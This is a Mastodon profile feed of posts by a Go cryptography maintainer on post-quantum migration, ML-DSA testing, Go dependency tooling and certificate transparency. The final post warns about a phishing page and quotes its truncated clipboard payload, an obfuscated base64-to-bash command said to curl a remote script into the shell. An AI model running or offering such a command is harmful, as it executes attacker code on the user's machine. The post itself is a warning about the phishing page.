Filippo Valsorda
@filippo@abyssdomain.expert
mastodon
4.5.9
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17
https://mkcert.dev / https://age-encryption.org / https://filippo.io/newsletter
🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” —@nickm@abyssdomain.expert
0
Followers
0
Following
Joined December 07, 2022
Location:
Rome 🇮🇹
Pronouns:
he/him
Website:
Twitter:
Posts
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
3d ago
I wrote up in the TLS mailing list why I think composite signatures (ML-DSA + ECDSA/RSA) are a net negative, will hurt the ecosystem, and should not be implemented.
Hybrid key exchange was simple and self-contained. Hybrid signatures would be a mountain of complexity in code responsible for half of sev:crit in crypto libraries since 2020.
https://mailarchive.ietf.org/arch/msg/tls/oh3jmmkHzHdp1hk4R4M9QjkmvBk/
View on abyssdomain.expert
33
0
27
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Apr 11, 2026
@sophieschmieg heh, @matthew_d_green would not take my correctly-leveraged bet :P
View full thread on abyssdomain.expert
3
0
0
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Apr 11, 2026
Alright, it's official! 💰
@matthew_d_green@ioc.exchange and I bet on what will break first, ML-KEM-768 or X25519. The loser donates to a 501(c)(3) picked by the winner.
If you have an opinion on quantum computers or lattices, you can join with a side bet. Just submit a PR!
76
5
67
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Apr 07, 2026
Oh hey, with all the 🔥 I almost missed that today was the 12th anniversary of Heartbleed.
The online test I cobbled together that night gave me the opportunities to get started in this line of work!
Initially it was hilariously bad: a Flask server shelling out to a patched Go crypto/tls binary.
75
4
25
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Apr 07, 2026
@S1m it's coming! https://github.com/str4d/age-plugin-yubikey/pull/215
View full thread on abyssdomain.expert
1
0
0
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Apr 07, 2026
@S1m it's as safe as it always was, and as safe as if QCs were impossible. (Which is to say very safe, no one really thinks AES will get surprise broken.)
\PSKs are fine if you can keep them from being compromised. The scheme you excerpted should be fine if auth_secret is not known to the attacker.
View full thread on abyssdomain.expert
0
1
0
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Apr 07, 2026
@timezone I'm afraid so, yes. (With the asterisk that the attacker also needs the public key to use a QC.)
View full thread on abyssdomain.expert
1
0
0
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Apr 06, 2026
@ohir @mikaeleiman nope, the distance between now and Ed25519 is way larger than between Ed25519 and Ed448.
View full thread on abyssdomain.expert
1
0
0
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Apr 06, 2026
@mikaeleiman @ohir yup, it's not great, but it is what it is. (RAM is kinda fine if you optimize for it, and CPU is actually faster than classical. But yes, size sucks.)
View full thread on abyssdomain.expert
1
1
0
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Apr 06, 2026
@timbray yeah, if ML-KEM is broken classically before the CRQCs arrive (after which hybrid doesn't help you anymore). Which part are you responding to?
View full thread on abyssdomain.expert
0
0
0
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Apr 06, 2026
@arianvp I do think they should get moving. But also, a passkey with a broken signature algorithm is still more secure than a password: the attacker needs the public key to fake a signature, and that's only in the website's database. I think it should still be phishing-resistant, too.
View full thread on abyssdomain.expert
2
1
0
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Apr 06, 2026
@neverpanic oh Debian oldstable is not gonna make it. stable might not make it! I have a secret, over-optimistic wish that this will kill the "constantly run software 3-5 years out of date" model of distribution, and free us upstreams from having to deal with its fallout, but I know it won't.
View full thread on abyssdomain.expert
7
2
1
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Apr 06, 2026
@jornfranke I am a cryptography engineer so I can tell you from experience: no, ML-KEM and ML-DSA are easier to implement and easier to test than all their classical alternatives.
View full thread on abyssdomain.expert
4
2
1
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Apr 06, 2026
@jornfranke I encourage you to reread the article because it addresses all your objections, especially the "why did they not break a small key".
I will add that the cryptography experts are actually very confident in the security of lattices. https://keymaterial.net/2025/12/13/a-very-unscientific-guide-to-the-security-of-various-pqc-algorithms/
View full thread on abyssdomain.expert
1
2
0
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Apr 06, 2026
@certkit They don't matter in terms of CA write load, monitors definitely need to consume all logs.
View full thread on abyssdomain.expert
0
0
0
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Apr 06, 2026
Two papers came out last week that suggest classical asymmetric cryptography might indeed be broken by quantum computers in just a few years.
That means we need to ship post-quantum crypto now, with the tools we have: ML-KEM and ML-DSA. I didn't think PQ auth was so urgent until recently.
214
20
229
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Apr 05, 2026
I finally chased down test coverage for the last edge cases of ML-DSA's low-level, constant-time field operations like Decompose.
This is an accumulated (https://words.filippo.io/accumulated/) test that locks in the output for all possible inputs of all these tricky functions. https://go.dev/cl/762940
It's not even that slow (5.27s)!
Also available on CCTV, along with accumulated keygen/sign/verify tests worth 60M random tests: https://github.com/C2SP/CCTV/tree/main/ML-DSA/accumulated
13
0
2
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Apr 04, 2026
There was no good way to see what CT logs are actually used by CAs, so I made a dashboard of Censys data on exe.dev.
There are some interesting patterns, but the main one is that Let's Encrypt is the only CA that evenly spreads load. Other CAs are mostly using older logs, or their own logs and Google's.
(Of course, LE is 50% of issuance, and GTS is 25%, so the rest don't matter much.)
20
2
11
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Mar 26, 2026
Last year, my position was that we still had time to design PQ authentication mechanisms.
Now, based on the pace of progress and on statements like Google's, I believe:
1. we need to finish rolling out PQ key exchange yesterday
2. we need to start rolling out PQ auth now
3. it's too late to ship any new non-PQ design or system
https://blog.google/innovation-and-ai/technology/safety-security/cryptography-migration-timeline/
39
6
27
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Mar 13, 2026
RE: @sophieschmieg@infosec.exchange
Yay test vectors!
I will write properly about this, but we are going pretty far to test ML-DSA *and make it easy to test,* so I am hopeful ML-DSA bugs will be rare compared to classical [EC|Ed]DSA bugs.
These test gaps were identified by writing multiple alternative ML-DSA implementations and mutation testing *those* to find missing vectors to then bring back to the Go implementation, and share on Wycheproof.
20
0
5
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Mar 02, 2026
TIL about the git fast-import textual format!
Lets me write tests for the c2sp.org redirector against a synthetic git repository I can easily edit, and even gives me stable shorthands to refer to commits.
https://github.com/C2SP/C2SP/commit/99d43ad2adcddb85acf37028be45590cd78008c3
12
3
4
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Feb 20, 2026
@jamesog That post makes almost no sense to me. If they are talking about module deps, since Go 1.17 go.mod has all the dependencies, there is nothing dynamic about it. If they are talking about package deps, it's not working.
View full thread on abyssdomain.expert
3
1
0
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Feb 20, 2026
Dependabot security alerts have terrible signal-to-noise ratio, especially for Go vulnerabilities. That hurts security!
Just turn it off and set up a pair of scheduled GitHub Actions, one running govulncheck, and the other running CI against the latest version of your dependencies.
Less work, less risk, better results!
78
10
50
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Feb 17, 2026
I just published a small security fix for a rarely used API in filippo.io/edwards25519. v1.1.1 is v1.1.0 + fix, while v1.2.0 has a few other nice changes.
If you get notified about it but you don't use MultiScalarMult, consider switching to a vulnerability scanner that actually respects your attention, like govulncheck!
https://github.com/FiloSottile/edwards25519/security/advisories/GHSA-fw7p-63qq-7hpr
9
0
5
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Feb 16, 2026
204
4
103
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Jan 05, 2026
PSA: go.sum is not a lockfile.
You never need to look at go.sum.
go.mod has everything you need.
53
4
24
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
Filippo Valsorda
@filippo@abyssdomain.expert
@FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17 https:// mkcert.dev / https:// age-encryption.org / https:// filippo.io/newsletter 🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” — @ nickm
abyssdomain.expert
@filippo@abyssdomain.expert
·
Jul 17, 2025
This is pretty well executed phishing.
The Copy button copies to the clipboard
echo "Y3Vy[...]ggJg==" | base64 -d | bash
which in turn curls this script https://gist.github.com/FiloSottile/385137f5ca2eabb51fd206bde2ff1d0a into bash.
They even detect piping, so to read it you have to run "curl | cat".
155
0
120